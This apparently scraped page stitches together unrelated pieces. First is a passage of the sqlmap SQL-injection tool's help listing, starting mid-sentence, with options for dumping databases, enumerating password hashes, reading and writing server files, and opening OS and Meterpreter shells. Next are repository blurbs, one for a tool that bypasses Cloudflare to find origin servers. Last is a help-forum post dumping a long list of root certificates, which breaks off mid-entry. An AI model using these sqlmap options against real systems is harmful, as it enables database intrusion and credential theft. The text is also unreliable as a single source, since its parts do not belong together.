code to match when query is evaluated to True --text-only Compare pages based only on the textual content --titles Compare pages based only on their titles Techniques: These options can be used to tweak testing of specific SQL injection techniques --technique=TECH SQL injection techniques to use (default "BEUSTQ") --time-sec=TIMESEC Seconds to delay the DBMS response (default 5) --union-cols=UCOLS Range of columns to test for UNION query SQL injection --union-char=UCHAR Character to use for bruteforcing number of columns --union-from=UFROM Table to use in FROM part of UNION query SQL injection --dns-domain=DNS.. Domain name used for DNS exfiltration attack --second-order=S.. Resulting page URL searched for second-order response Fingerprint: -f, --fingerprint Perform an extensive DBMS version fingerprint Enumeration: These options can be used to enumerate the back-end database management system information, structure and data contained in the tables. Moreover you can run your own SQL statements -a, --all Retrieve everything -b, --banner Retrieve DBMS banner --current-user Retrieve DBMS current user --current-db Retrieve DBMS current database --hostname Retrieve DBMS server hostname --is-dba Detect if the DBMS current user is DBA --users Enumerate DBMS users --passwords Enumerate DBMS users password hashes --privileges Enumerate DBMS users privileges --roles Enumerate DBMS users roles --dbs Enumerate DBMS databases --tables Enumerate DBMS database tables --columns Enumerate DBMS database table columns --schema Enumerate DBMS schema --count Retrieve number of entries for table(s) --dump Dump DBMS database table entries --dump-all Dump all DBMS databases tables entries --search Search column(s), table(s) and/or database name(s) --comments Retrieve DBMS comments -D DB DBMS database to enumerate -T TBL DBMS database table(s) to enumerate -C COL DBMS database table column(s) to enumerate -X EXCLUDECOL DBMS database table column(s) to not enumerate -U USER DBMS user to enumerate --exclude-sysdbs Exclude DBMS system databases when enumerating tables --pivot-column=P.. Pivot column name --where=DUMPWHERE Use WHERE condition while table dumping --start=LIMITSTART First query output entry to retrieve --stop=LIMITSTOP Last query output entry to retrieve --first=FIRSTCHAR First query output word character to retrieve --last=LASTCHAR Last query output word character to retrieve --sql-query=QUERY SQL statement to be executed --sql-shell Prompt for an interactive SQL shell --sql-file=SQLFILE Execute SQL statements from given file(s) Brute force: These options can be used to run brute force checks --common-tables Check existence of common tables --common-columns Check existence of common columns User-defined function injection: These options can be used to create custom user-defined functions --udf-inject Inject custom user-defined functions --shared-lib=SHLIB Local path of the shared library File system access: These options can be used to access the back-end database management system underlying file system --file-read=RFILE Read a file from the back-end DBMS file system --file-write=WFILE Write a local file on the back-end DBMS file system --file-dest=DFILE Back-end DBMS absolute filepath to write to Operating system access: These options can be used to access the back-end database management system underlying operating system --os-cmd=OSCMD Execute an operating system command --os-shell Prompt for an interactive operating system shell --os-pwn Prompt for an OOB shell, Meterpreter or VNC --os-smbrelay One click prompt for an OOB shell, Meterpreter or VNC --os-bof Stored procedure buffer overflow exploitation --priv-esc Database process user privilege escalation --msf-path=MSFPATH Local path where Metasploit Framework is installed --tmp-path=TMPPATH Remote absolute path of temporary files directory Windows registry access: These options can be used to access the back-end database management system Windows registry --reg-read Read a Windows registry key value --reg-add Write a Windows registry key value data --reg-del Delete a Windows registry key value --reg-key=REGKEY Windows registry key --reg-value=REGVAL Windows registry key value --reg-data=REGDATA Windows registry key value data --reg-type=REGTYPE Windows registry key value type General: These options can be used to set some general working parameters -s SESSIONFILE Load session from a stored (.sqlite) file -t TRAFFICFILE Log all HTTP traffic into a textual file --batch Never ask for user input, use the default behaviour --binary-fields=.. Result fields having binary values (e.g. "digest") --charset=CHARSET Force character encoding used for data retrieval --crawl=CRAWLDEPTH Crawl the website starting from the target URL --crawl-exclude=.. Regexp to exclude pages from crawling (e.g. "logout") --csv-del=CSVDEL Delimiting character used in CSV output (default ",") --dump-format=DU.. Format of dumped data (CSV (default), HTML or SQLITE) --eta Display for each output the estimated time of arrival --flush-session Flush session files for current target --forms Parse and test forms on target URL --fresh-queries Ignore query results stored in session file --hex Use DBMS hex function(s) for data retrieval --output-dir=OUT.. Custom output directory path --parse-errors Parse and display DBMS error messages from responses --save=SAVECONFIG Save options to a configuration INI file --scope=SCOPE Regexp to filter targets from provided proxy log --test-filter=TE.. Select tests by payloads and/or titles (e.g. ROW) --test-skip=TEST.. Skip tests by payloads and/or titles (e.g. BENCHMARK) --update Update sqlmap Miscellaneous: -z MNEMONICS Use short mnemonics (e.g. "flu,bat,ban,tec=EU") --alert=ALERT Run host OS command(s) when SQL injection is found --answers=ANSWERS Set question answers (e.g. "quit=N,follow=N") --beep Beep on question and/or when SQL injection is found --cleanup Clean up the DBMS from sqlmap specific UDF and tables --dependencies Check for missing (non-core) sqlmap dependencies --disable-coloring Disable console output coloring --gpage=GOOGLEPAGE Use Google dork results from specified page number --identify-waf Make a thorough testing for a WAF/IPS/IDS protection --skip-waf Skip heuristic detection of WAF/IPS/IDS protection --mobile Imitate smartphone through HTTP User-Agent header --offline Work in offline mode (only use session data) --page-rank Display page rank (PR) for Google dork results --purge-output Safely remove all content from output directory --smart Conduct thorough tests only if positive heuristic(s) --sqlmap-shell Prompt for an interactive sqlmap shell --wizard Simple wizard interface for beginner users
LeargasSecurity / Ja3 Fingerprint RepositorySSL/TLS client fingerprints that can be easily shared for threat intelligence.
csmutz / Apache Tls FingerprintExpose TLS fingerprint metadata in apache mod_ssl
4l3xBB / BeyondFlareTool to Bypass websites protected by CloudFlare gathering information related to them. This tool extracts Possible Origin IP Server using Gathering Information Techniques like SSL Certs Fingerprints, Subdomains Enumeration, DNS History Records
Antelope800 / Please Help [Certificates] Detected (138) 1. OISTE WISeKey Global Root GC CA Alias: system:3c899c73.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: 212a560caeda0cab4045bf2ba22d3aea SHA1 Fingerprint: e011845e34debe8881b99cf61626d1961fc3b931 Issued to: OISTE WISeKey Global Root GC CA Organization: WISeKey Issued by: OISTE WISeKey Global Root GC CA Organization: WISeKey Inserted: 31 Dec 2008 Validity: 09 May 2017 to 09 May 2042 2. CFCA EV ROOT Alias: system:9282e51c.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: 184accd6 SHA1 Fingerprint: e2b8294b5584ab6b58c290466cac3fb8398f8483 Issued to: CFCA EV ROOT Organization: China Financial Certification Authority Issued by: CFCA EV ROOT Organization: China Financial Certification Authority Inserted: 31 Dec 2008 Validity: 07 Aug 2012 to 30 Dec 2029 3. Cybertrust Global Root Alias: system:343eb6cb.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: 400000000010f85aa2d48 SHA1 Fingerprint: 5f43e5b1bff8788cac1cc7ca4a9ac6222bcc34c6 Issued to: Cybertrust Global Root Organization: Cybertrust, Inc Issued by: Cybertrust Global Root Organization: Cybertrust, Inc Inserted: 31 Dec 2008 Validity: 15 Dec 2006 to 15 Dec 2021 4. QuoVadis Root CA 1 G3 Alias: system:52b525c7.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: 78585f2ead2c194be3370735341328b596d46593 SHA1 Fingerprint: 1b8eea5796291ac939eab80a811a7373c0937967 Issued to: QuoVadis Root CA 1 G3 Organization: QuoVadis Limited Issued by: QuoVadis Root CA 1 G3 Organization: QuoVadis Limited Inserted: 31 Dec 2008 Validity: 12 Jan 2012 to 12 Jan 2042 5. Staat der Nederlanden Root CA - G3 Alias: system:5a250ea7.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: 98a239 SHA1 Fingerprint: d8eb6b41519259e0f3e78500c03db68897c9eefc Issued to: Staat der Nederlanden Root CA - G3 Organization: Staat der Nederlanden Issued by: Staat der Nederlanden Root CA - G3 Organization: Staat der Nederlanden Inserted: 31 Dec 2008 Validity: 14 Nov 2013 to 13 Nov 2028 6. Certum Trusted Network CA Alias: system:95aff9e3.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: 444c0 SHA1 Fingerprint: 07e032e020b72c3f192f0628a2593a19a70f069e Issued to: Certum Trusted Network CA Organization: Unizeto Technologies S.A. Issued by: Certum Trusted Network CA Organization: Unizeto Technologies S.A. Inserted: 31 Dec 2008 Validity: 22 Oct 2008 to 31 Dec 2029 7. thawte Primary Root CA Alias: system:00673b5b.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: 344ed55720d5edec49f42fce37db2b6d SHA1 Fingerprint: 91c6d6ee3e8ac86384e548c299295c756c817b81 Issued to: thawte Primary Root CA Organization: thawte, Inc. Issued by: thawte Primary Root CA Organization: thawte, Inc. Inserted: 31 Dec 2008 Validity: 16 Nov 2006 to 16 Jul 2036 8. GTS Root R4 Alias: system:5acf816d.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: 6e47a9c88b94b6e8bb3b2ad8a2b2c199 SHA1 Fingerprint: 2a1d6027d94ab10a1c4d915ccd33a0cb3e2d54cb Issued to: GTS Root R4 Organization: Google Trust Services LLC Issued by: GTS Root R4 Organization: Google Trust Services LLC Inserted: 31 Dec 2008 Validity: 21 Jun 2016 to 21 Jun 2036 9. ACCVRAIZ1 Alias: system:3c9a4d3b.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: 5ec3b7a6437fa4e0 SHA1 Fingerprint: 93057a8815c64fce882ffa9116522878bc536417 Issued to: ACCVRAIZ1 Organization: ACCV Issued by: ACCVRAIZ1 Organization: ACCV Inserted: 31 Dec 2008 Validity: 05 May 2011 to 31 Dec 2030 10. GeoTrust Primary Certification Authority - G2 Alias: system:27af790d.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: 3cb2f4480a00e2feeb243b5e603ec36b SHA1 Fingerprint: 8d1784d537f3037dec70fe578b519a99e610d7b0 Issued to: GeoTrust Primary Certification Authority - G2 Organization: GeoTrust Inc. Issued by: GeoTrust Primary Certification Authority - G2 Organization: GeoTrust Inc. Inserted: 31 Dec 2008 Validity: 04 Nov 2007 to 18 Jan 2038 11. T-TeleSec GlobalRoot Class 2 Alias: system:d06393bb.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: 1 SHA1 Fingerprint: 590d2d7d884f402e617ea562321765cf17d894e9 Issued to: T-TeleSec GlobalRoot Class 2 Organization: T-Systems Enterprise Services GmbH Issued by: T-TeleSec GlobalRoot Class 2 Organization: T-Systems Enterprise Services GmbH Inserted: 31 Dec 2008 Validity: 01 Oct 2008 to 01 Oct 2033 12. GlobalSign Root CA Alias: system:b0f3e76e.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: 40000000001154b5ac394 SHA1 Fingerprint: b1bc968bd4f49d622aa89a81f2150152a41d829c Issued to: GlobalSign Root CA Organization: GlobalSign nv-sa Issued by: GlobalSign Root CA Organization: GlobalSign nv-sa Inserted: 31 Dec 2008 Validity: 01 Sep 1998 to 28 Jan 2028 13. Certum Trusted Network CA 2 Alias: system:cb1c3204.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: 21d6d04a4f250fc93237fcaa5e128de9 SHA1 Fingerprint: d3dd483e2bbf4c05e8af10f5fa7626cfd3dc3092 Issued to: Certum Trusted Network CA 2 Organization: Unizeto Technologies S.A. Issued by: Certum Trusted Network CA 2 Organization: Unizeto Technologies S.A. Inserted: 31 Dec 2008 Validity: 06 Oct 2011 to 06 Oct 2046 14. SecureTrust CA Alias: system:cf701eeb.0 Type: X.509 Entry Type: Certificate Usage: Digital Signature Key Cert Sign CRL Signing Version: 3 Serial Number: cf08e5c0816a5ad427ff0eb271859d0 SHA1 Fingerprint: 8782c6c304353bcfd29692d2593e7d44d934ff11 Issued to: SecureTrust CA Organization: SecureTrust Corporation Issued by: SecureTrust CA Organization: SecureTrust Corporation Inserted: 31 Dec 2008 Validity: 07 Nov 2006 to 31 Dec 2029 15. GTS Root R3 Alias: system:6b03dec0.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: 6e47a9c76ca9732440890f0355dd8d1d SHA1 Fingerprint: 30d4246f07ffdb91898a0be9496611eb8c5e46e5 Issued to: GTS Root R3 Organization: Google Trust Services LLC Issued by: GTS Root R3 Organization: Google Trust Services LLC Inserted: 31 Dec 2008 Validity: 21 Jun 2016 to 21 Jun 2036 16. Secure Global CA Alias: system:bdacca6f.0 Type: X.509 Entry Type: Certificate Usage: Digital Signature Key Cert Sign CRL Signing Version: 3 Serial Number: 75622a4e8d48a894df413c8f0f8eaa5 SHA1 Fingerprint: 3a44735ae581901f248661461e3b9cc45ff53a1b Issued to: Secure Global CA Organization: SecureTrust Corporation Issued by: Secure Global CA Organization: SecureTrust Corporation Inserted: 31 Dec 2008 Validity: 07 Nov 2006 to 31 Dec 2029 17. Entrust Root Certification Authority Alias: system:bf64f35b.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: 456b5054 SHA1 Fingerprint: b31eb1b740e36c8402dadc37d44df5d4674952f9 Issued to: Entrust Root Certification Authority Organization: Entrust, Inc. Issued by: Entrust Root Certification Authority Organization: Entrust, Inc. Inserted: 31 Dec 2008 Validity: 27 Nov 2006 to 27 Nov 2026 18. Chambers of Commerce Root - 2008 Alias: system:1eb37bdf.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: a3da427ea4b1aeda SHA1 Fingerprint: 786a74ac76ab147f9c6a3050ba9ea87efe9ace3c Issued to: Chambers of Commerce Root - 2008 Organization: AC Camerfirma S.A. Issued by: Chambers of Commerce Root - 2008 Organization: AC Camerfirma S.A. Inserted: 31 Dec 2008 Validity: 01 Aug 2008 to 31 Jul 2038 19. emSign Root CA - G1 Alias: system:f459871d.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: 31f5e4620c6c58edd6d8 SHA1 Fingerprint: 8ac7ad8f73ac4ec1b5754da540f4fccf7cb58e8c Issued to: emSign Root CA - G1 Organization: eMudhra Technologies Limited Issued by: emSign Root CA - G1 Organization: eMudhra Technologies Limited Inserted: 31 Dec 2008 Validity: 18 Feb 2018 to 18 Feb 2043 20. LuxTrust Global Root 2 Alias: system:c907e29b.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: a7ea6df4b449eda6a24859ee6b815d3167fbbb1 SHA1 Fingerprint: 1e0e56190ad18b2598b20444ff668a0417995f3f Issued to: LuxTrust Global Root 2 Organization: LuxTrust S.A. Issued by: LuxTrust Global Root 2 Organization: LuxTrust S.A. Inserted: 31 Dec 2008 Validity: 05 Mar 2015 to 05 Mar 2035 21. DST Root CA X3 Alias: system:12d55845.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: 44afb080d6a327ba893039862ef8406b SHA1 Fingerprint: dac9024f54d8f6df94935fb1732638ca6ad77c13 Issued to: DST Root CA X3 Organization: Digital Signature Trust Co. Issued by: DST Root CA X3 Organization: Digital Signature Trust Co. Inserted: 31 Dec 2008 Validity: 30 Sep 2000 to 30 Sep 2021 22. Staat der Nederlanden EV Root CA Alias: system:3c6676aa.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: 98968d SHA1 Fingerprint: 76e27ec14fdb82c1c0a675b505be3d29b4eddbbb Issued to: Staat der Nederlanden EV Root CA Organization: Staat der Nederlanden Issued by: Staat der Nederlanden EV Root CA Organization: Staat der Nederlanden Inserted: 31 Dec 2008 Validity: 08 Dec 2010 to 08 Dec 2022 23. Staat der Nederlanden Root CA - G2 Alias: system:3d441de8.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: 98968c SHA1 Fingerprint: 59af82799186c7b47507cbcf035746eb04ddb716 Issued to: Staat der Nederlanden Root CA - G2 Organization: Staat der Nederlanden Issued by: Staat der Nederlanden Root CA - G2 Organization: Staat der Nederlanden Inserted: 31 Dec 2008 Validity: 26 Mar 2008 to 25 Mar 2020 24. Go Daddy Root Certificate Authority - G2 Alias: system:bc3f2570.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: 0 SHA1 Fingerprint: 47beabc922eae80e78783462a79f45c254fde68b Issued to: Go Daddy Root Certificate Authority - G2 Organization: GoDaddy.com, Inc. Issued by: Go Daddy Root Certificate Authority - G2 Organization: GoDaddy.com, Inc. Inserted: 31 Dec 2008 Validity: 31 Aug 2009 to 31 Dec 2037 25. COMODO RSA Certification Authority Alias: system:d4c339cb.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: 4caaf9cadb636fe01ff74ed85b03869d SHA1 Fingerprint: afe5d244a8d1194230ff479fe2f897bbcd7a8cb4 Issued to: COMODO RSA Certification Authority Organization: COMODO CA Limited Issued by: COMODO RSA Certification Authority Organization: COMODO CA Limited Inserted: 31 Dec 2008 Validity: 18 Jan 2010 to 18 Jan 2038 26. GeoTrust Global CA Alias: system:7999be0d.0 Type: X.509 Entry Type: Certificate Version: 3 Serial Number: 23456 SHA1 Fingerprint: de28f4a4ffe5b92fa3c503d1a349a7f9962a8212 Issued to: GeoTrust Global CA Organization: GeoTrust Inc. Issued by: GeoTrust Global CA Organization: GeoTrust Inc. Inserted: 31 Dec 2008 Validity: 21 May 2002 to 21 May 2022 27. USERTrust ECC Certification Authority Alias: system:04f60c28.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: 5c8b99c55a94c5d27156decd8980cc26 SHA1 Fingerprint: d1cbca5db2d52a7f693b674de5f05a1d0c957df0 Issued to: USERTrust ECC Certification Authority Organization: The USERTRUST Network Issued by: USERTrust ECC Certification Authority Organization: The USERTRUST Network Inserted: 31 Dec 2008 Validity: 31 Jan 2010 to 18 Jan 2038 28. SwissSign Gold CA - G2 Alias: system:3c860d51.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: bb401c43f55e4fb0 SHA1 Fingerprint: d8c5388ab7301b1b6ed47ae645253a6f9f1a2761 Issued to: SwissSign Gold CA - G2 Organization: SwissSign AG Issued by: SwissSign Gold CA - G2 Organization: SwissSign AG Inserted: 31 Dec 2008 Validity: 25 Oct 2006 to 25 Oct 2036 29. DigiCert Assured ID Root G2 Alias: system:8d6437c3.0 Type: X.509 Entry Type: Certificate Usage: Digital Signature Key Cert Sign CRL Signing Version: 3 Serial Number: b931c3ad63967ea6723bfc3af9af44b SHA1 Fingerprint: a14b48d943ee0a0e40904f3ce0a4c09193515d3f Issued to: DigiCert Assured ID Root G2 Organization: DigiCert Inc Issued by: DigiCert Assured ID Root G2 Organization: DigiCert Inc Inserted: 31 Dec 2008 Validity: 01 Aug 2013 to 15 Jan 2038 30. Amazon Root CA 4 Alias: system:d41b5e2a.0 Type: X.509 Entry Type: Certificate Usage: Digital Signature Key Cert Sign CRL Signing Version: 3 Serial Number: 66c9fd7c1bb104c2943e5717b7b2cc81ac10e SHA1 Fingerprint: f6108407d6f8bb67980cc2e244c2ebae1cef63be Issued to: Amazon Root CA 4 Organization: Amazon Issued by: Amazon Root CA 4 Organization: Amazon Inserted: 31 Dec 2008 Validity: 25 May 2015 to 25 May 2040 31. AAA Certificate Services Alias: system:75680d2e.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: 1 SHA1 Fingerprint: d1eb23a46d17d68fd92564c2f1f1601764d8e349 Issued to: AAA Certificate Services Organization: Comodo CA Limited Issued by: AAA Certificate Services Organization: Comodo CA Limited Inserted: 31 Dec 2008 Validity: 31 Dec 2003 to 31 Dec 2028 32. thawte Primary Root CA - G3 Alias: system:67495436.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: 600197b746a7eab4b49ad64b2ff790fb SHA1 Fingerprint: f18b538d1be903b6a6f056435b171589caf36bf2 Issued to: thawte Primary Root CA - G3 Organization: thawte, Inc. Issued by: thawte Primary Root CA - G3 Organization: thawte, Inc. Inserted: 31 Dec 2008 Validity: 01 Apr 2008 to 01 Dec 2037 33. GTS Root R2 Alias: system:c559d742.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: 6e47a9c65ab3e720c5309a3f6852f26f SHA1 Fingerprint: d273962a2a5e399f733fe1c71e643f033834fc4d Issued to: GTS Root R2 Organization: Google Trust Services LLC Issued by: GTS Root R2 Organization: Google Trust Services LLC Inserted: 31 Dec 2008 Validity: 21 Jun 2016 to 21 Jun 2036 34. emSign Root CA - C1 Alias: system:dbff3a01.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: aecf00bac4cf32f843b2 SHA1 Fingerprint: e72ef1dffcb20928cf5dd4d56737b151cb864f01 Issued to: emSign Root CA - C1 Organization: eMudhra Inc Issued by: emSign Root CA - C1 Organization: eMudhra Inc Inserted: 31 Dec 2008 Validity: 18 Feb 2018 to 18 Feb 2043 35. Entrust Root Certification Authority - EC1 Alias: system:b3fb433b.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: a68b79290000000050d091f9 SHA1 Fingerprint: 20d80640df9b25f512253a11eaf7598aeb14b547 Issued to: Entrust Root Certification Authority - EC1 Organization: Entrust, Inc. Issued by: Entrust Root Certification Authority - EC1 Organization: Entrust, Inc. Inserted: 31 Dec 2008 Validity: 18 Dec 2012 to 18 Dec 2037 36. T-TeleSec GlobalRoot Class 3 Alias: system:1e1eab7c.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: 1 SHA1 Fingerprint: 55a6723ecbf2eccdc3237470199d2abe11e381d1 Issued to: T-TeleSec GlobalRoot Class 3 Organization: T-Systems Enterprise Services GmbH Issued by: T-TeleSec GlobalRoot Class 3 Organization: T-Systems Enterprise Services GmbH Inserted: 31 Dec 2008 Validity: 01 Oct 2008 to 01 Oct 2033 37. DigiCert Global Root G3 Alias: system:ed39abd0.0 Type: X.509 Entry Type: Certificate Usage: Digital Signature Key Cert Sign CRL Signing Version: 3 Serial Number: 55556bcf25ea43535c3a40fd5ab4572 SHA1 Fingerprint: 7e04de896a3e666d00e687d33ffad93be83d349e Issued to: DigiCert Global Root G3 Organization: DigiCert Inc Issued by: DigiCert Global Root G3 Organization: DigiCert Inc Inserted: 31 Dec 2008 Validity: 01 Aug 2013 to 15 Jan 2038 38. SSL.com EV Root Certification Authority RSA R2 Alias: system:583d0756.0 Type: X.509 Entry Type: Certificate Usage: Digital Signature Key Cert Sign CRL Signing Version: 3 Serial Number: 56b629cd34bc78f6 SHA1 Fingerprint: 743af0529bd032a0f44a83cdd4baa97b7c2ec49a Issued to: SSL.com EV Root Certification Authority RSA R2 Organization: SSL Corporation Issued by: SSL.com EV Root Certification Authority RSA R2 Organization: SSL Corporation Inserted: 31 Dec 2008 Validity: 31 May 2017 to 30 May 2042 39. thawte Primary Root CA - G2 Alias: system:a7d2cf64.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: 35fc265cd9844fc93d263d579baed756 SHA1 Fingerprint: aadbbc22238fc401a127bb38ddf41ddb089ef012 Issued to: thawte Primary Root CA - G2 Organization: thawte, Inc. Issued by: thawte Primary Root CA - G2 Organization: thawte, Inc. Inserted: 31 Dec 2008 Validity: 04 Nov 2007 to 18 Jan 2038 40. ISRG Root X1 Alias: system:6187b673.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: 8210cfb0d240e3594463e0bb63828b00 SHA1 Fingerprint: cabd2a79a1076a31f21d253635cb039d4329a5e8 Issued to: ISRG Root X1 Organization: Internet Security Research Group Issued by: ISRG Root X1 Organization: Internet Security Research Group Inserted: 31 Dec 2008 Validity: 04 Jun 2015 to 04 Jun 2035 41. GeoTrust Universal CA 2 Alias: system:87753b0d.0 Type: X.509 Entry Type: Certificate Usage: Digital Signature Key Cert Sign CRL Signing Version: 3 Serial Number: 1 SHA1 Fingerprint: 379a197b418545350ca60369f33c2eaf474f2079 Issued to: GeoTrust Universal CA 2 Organization: GeoTrust Inc. Issued by: GeoTrust Universal CA 2 Organization: GeoTrust Inc. Inserted: 31 Dec 2008 Validity: 04 Mar 2004 to 04 Mar 2029 42. null Alias: system:882de061.0 Type: X.509 Entry Type: Certificate Usage: Digital Signature Non Repudiation Key Cert Sign CRL Signing Version: 3 Serial Number: 200605167002 SHA1 Fingerprint: fab7ee36972662fb2db02af6bf03fde87c4b2f9b Issued to: null Organization: certSIGN Issued by: null Organization: certSIGN Inserted: 31 Dec 2008 Validity: 04 Jul 2006 to 04 Jul 2031 43. QuoVadis Root Certification Authority Alias: system:5cf9d536.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: 3ab6508b SHA1 Fingerprint: de3f40bd5093d39b6c60f6dabc076201008976c9 Issued to: QuoVadis Root Certification Authority Organization: QuoVadis Limited Issued by: QuoVadis Root Certification Authority Organization: QuoVadis Limited Inserted: 31 Dec 2008 Validity: 19 Mar 2001 to 17 Mar 2021 44. GDCA TrustAUTH R5 ROOT Alias: system:ab59055e.0 Type: X.509 Entry Type: Certificate Usage: Digital Signature Key Cert Sign CRL Signing Version: 3 Serial Number: 7d0997fef047ea7a SHA1 Fingerprint: 0f36385b811a25c39b314e83cae9346670cc74b4 Issued to: GDCA TrustAUTH R5 ROOT Organization: GUANG DONG CERTIFICATE AUTHORITY CO.,LTD. Issued by: GDCA TrustAUTH R5 ROOT Organization: GUANG DONG CERTIFICATE AUTHORITY CO.,LTD. Inserted: 31 Dec 2008 Validity: 26 Nov 2014 to 31 Dec 2040 45. Baltimore CyberTrust Root Alias: system:3ad48a91.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: 20000b9 SHA1 Fingerprint: d4de20d05e66fc53fe1a50882c78db2852cae474 Issued to: Baltimore CyberTrust Root Organization: Baltimore Issued by: Baltimore CyberTrust Root Organization: Baltimore Inserted: 31 Dec 2008 Validity: 12 May 2000 to 12 May 2025 46. GlobalSign Alias: system:985c1f52.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: 45e6bb038333c3856548e6ff4551 SHA1 Fingerprint: 8094640eb5a7a1ca119c1fddd59f810263a7fbd1 Issued to: GlobalSign Organization: GlobalSign Issued by: GlobalSign Organization: GlobalSign Inserted: 31 Dec 2008 Validity: 09 Dec 2014 to 09 Dec 2034 47. COMODO ECC Certification Authority Alias: system:89c02a45.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: 1f47afaa62007050544c019e9b63992a SHA1 Fingerprint: 9f744e9f2b4dbaec0f312c50b6563b8e2d93c311 Issued to: COMODO ECC Certification Authority Organization: COMODO CA Limited Issued by: COMODO ECC Certification Authority Organization: COMODO CA Limited Inserted: 31 Dec 2008 Validity: 05 Mar 2008 to 18 Jan 2038 48. AffirmTrust Networking Alias: system:86212b19.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: 7c4f04391cd4992d SHA1 Fingerprint: 293621028b20ed02f566c532d1d6ed909f45002f Issued to: AffirmTrust Networking Organization: AffirmTrust Issued by: AffirmTrust Networking Organization: AffirmTrust Inserted: 31 Dec 2008 Validity: 29 Jan 2010 to 31 Dec 2030 49. Buypass Class 3 Root CA Alias: system:2d9dafe4.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: 2 SHA1 Fingerprint: dafaf7fa6684ec068f1450bdc7c281a5bca96457 Issued to: Buypass Class 3 Root CA Organization: Buypass AS-983163327 Issued by: Buypass Class 3 Root CA Organization: Buypass AS-983163327 Inserted: 31 Dec 2008 Validity: 26 Oct 2010 to 26 Oct 2040 50. QuoVadis Root CA 3 G3 Alias: system:e442e424.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: 2ef59b0228a7db7affd5a3a9eebd03a0cf126a1d SHA1 Fingerprint: 4812bd923ca8c43906e7306d2796e6a4cf222e7d Issued to: QuoVadis Root CA 3 G3 Organization: QuoVadis Limited Issued by: QuoVadis Root CA 3 G3 Organization: QuoVadis Limited Inserted: 31 Dec 2008 Validity: 12 Jan 2012 to 12 Jan 2042 51. Microsec e-Szigno Root CA 2009 Alias: system:e8651083.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: c27e43044e473f19 SHA1 Fingerprint: 89df74fe5cf40f4a80f9e3377d54da91e101318e Issued to: Microsec e-Szigno Root CA 2009 Organization: Microsec Ltd. Issued by: Microsec e-Szigno Root CA 2009 Organization: Microsec Ltd. Inserted: 31 Dec 2008 Validity: 16 Jun 2009 to 30 Dec 2029 52. SSL.com EV Root Certification Authority ECC Alias: system:7892ad52.0 Type: X.509 Entry Type: Certificate Usage: Digital Signature Key Cert Sign CRL Signing Version: 3 Serial Number: 2c299c5b16ed0595 SHA1 Fingerprint: 4cdd51a3d1f5203214b0c6c532230391c746426d Issued to: SSL.com EV Root Certification Authority ECC Organization: SSL Corporation Issued by: SSL.com EV Root Certification Authority ECC Organization: SSL Corporation Inserted: 31 Dec 2008 Validity: 12 Feb 2016 to 12 Feb 2041 53. VeriSign Class 3 Public Primary Certification Authority - G4 Alias: system:5e4e69e7.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: 2f80fe238c0e220f486712289187acb3 SHA1 Fingerprint: 